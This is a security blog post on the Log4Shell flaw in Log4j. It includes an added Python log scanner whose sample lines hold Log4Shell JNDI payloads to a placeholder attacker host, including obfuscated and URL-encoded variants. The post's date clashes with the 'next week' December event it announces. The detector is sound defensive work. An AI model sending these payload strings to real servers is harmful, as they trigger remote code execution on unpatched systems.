Log4Shell: The Most Dangerous Java Vulnerability in Years

3 min read
20 September 2022


A zero-day exploit, since known as "Log4Shell", was discovered in the wild on December 9, 2021. It targets a critical remote code execution (RCE) vulnerability in Log4j, the widely used open-source Java logging library. (Per NIST, in affected versions the JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints, so an attacker who can get a crafted lookup string into a logged message can make the server fetch and execute remote code.) Numerous platforms appear to be affected, including Apple, Cloudflare, and Twitter, as well as the plethora of well-known Java ecosystem products that carry Log4j in their supply chains, including Logstash, Apache Kafka, Elasticsearch, and even Minecraft.
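The mechanism described above, a lookup string inside a logged message that resolves an attacker-controlled JNDI endpoint, is also what defenders hunt for in their own access logs. What follows is an added example, not code from the original post or from Bugcrowd: a small Python detector that URL-decodes each line, collapses the nested lookups attackers used to disguise the word "jndi" (`${lower:j}`, the empty-lookup default `${::-j}`, and `${env:NOPE:-j}`), and then reports every JNDI lookup with its scheme and target. The log lines are constructed for the example and the host name attacker.example is a placeholder.

```python
import re
from dataclasses import dataclass
from urllib.parse import unquote

# Constructed sample access-log lines (not from any real incident). Lines 1-6 carry
# JNDI lookups in the User-Agent or request path in forms seen during Log4Shell
# scanning; lines 7-8 are benign and must not be flagged.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/b}"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "${${env:NOPE:-j}ndi:dns://attacker.example/c}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${JnDi:LDAP://attacker.example/d}"',
    '10.0.0.10 - - "GET /%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fe%7D HTTP/1.1" 404 "curl/7.79"',
    '10.0.0.11 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.12 - - "GET /?q=${date:yyyy} HTTP/1.1" 200 "curl/7.79"',
]

# An innermost lookup: a ${...} whose body contains no further braces.
_INNER_LOOKUP = re.compile(r"\$\{([^{}]*)\}")
# A JNDI lookup once obfuscation has been removed; the URI after "jndi:" is captured.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([^}]*)\}", re.IGNORECASE)


def _reduce(match, changed):
    """Resolve one innermost lookup the way Log4j's string substitution would.

    Only the lookups attackers use to hide the word "jndi" are resolved here:
    ${lower:X}, ${upper:X} and the default-value form ${name:-default}, which
    yields "default" when the lookup fails (so ${::-j} and ${env:NOPE:-j} both
    become "j"). Anything else, including the jndi lookup itself, is kept as-is.
    """
    body = match.group(1)
    prefix, _, rest = body.partition(":")
    key = prefix.strip().lower()  # Log4j matches lookup names case-insensitively
    if key == "lower":
        changed.append(True)
        return rest.lower()
    if key == "upper":
        changed.append(True)
        return rest.upper()
    if ":-" in body and key != "jndi":
        changed.append(True)
        return body.split(":-", 1)[1]
    return match.group(0)


def normalize(text, max_rounds=50):
    """URL-decode the line, then collapse nested obfuscation lookups inside-out."""
    text = unquote(text)  # covers access logs that record the raw, still-encoded request
    for _ in range(max_rounds):
        changed = []
        text = _INNER_LOOKUP.sub(lambda m: _reduce(m, changed), text)
        if not changed:  # no lookup was resolved in this pass, so we are done
            break
    return text


@dataclass(frozen=True)
class Finding:
    line_no: int
    scheme: str      # ldap, ldaps, rmi, dns, ...
    uri: str         # the JNDI target, e.g. ldap://attacker.example/a
    normalized: str  # the de-obfuscated line, useful for triage


def scan_log_lines(lines):
    """Return one Finding per JNDI lookup found after de-obfuscation."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        norm = normalize(line)
        for m in _JNDI.finditer(norm):
            uri = m.group(1).strip()
            findings.append(Finding(line_no, uri.partition(":")[0].lower(), uri, norm))
    return findings


if __name__ == "__main__":
    for f in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {f.line_no}: jndi lookup via {f.scheme} -> {f.uri}")
```

A hit is evidence of an attempt that reached an application, not of compromise: to decide whether a lookup actually fired, correlate the timestamp with outbound LDAP, RMI or DNS connections from that host and check the Log4j version it runs. Searching logs is a detection control only; the remediation is upgrading every affected Log4j copy, including the ones bundled inside the vendor products listed above, to a fixed release.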



The Log4j vulnerability is being viewed as the most serious in years, potentially more serious than CVE-2017-5638, the Apache Struts RCE that led to the massive Equifax breach. According to Bugcrowd founder and CTO Casey Ellis, this latest vulnerability is a toxic mix of a massive attack surface, easy exploitability, a hard-to-elude dependency, and extreme virality. It is also a reminder that software supply chains have grown extremely complex, with interdependencies that are often beyond the reach of automated tools such as scanners.



It will provide a moment of clarity for companies that have not yet adopted a platform-powered continuous security testing approach, which combines technology, data, and human insight to detect and fix weaknesses before they cause harm. In a subsequent blog post we'll share how this approach helped Bugcrowd verify the context of its findings and communicate Log4Shell exposures to customers.



We are available to assist you with the following:

1. A 30-day "Log4j On Fire" bug bounty solution for continuous, crowd-powered discovery of Log4Shell exposures around your perimeter. Get started and read the details.
2. A Security Flash video featuring Casey Ellis and Adam Foster, Application Security Engineer, with deeper insight into this vulnerability's risk profile and its potential future impact.
3. A live Q&A with Casey next week (Monday, Dec. 20 at 10 am PST) to answer your questions about the best ways to safeguard your data and apply best practices against the Log4j vulnerability and the Log4Shell exploit. Sign up now to reserve your seat.
4. One view of all our Log4j/Log4Shell resources here.



We are extremely proud of our customers and researchers who have been working tirelessly to make our digitally connected world more secure in this time of crisis. As always, we'll work through this together!

Kay Kincaid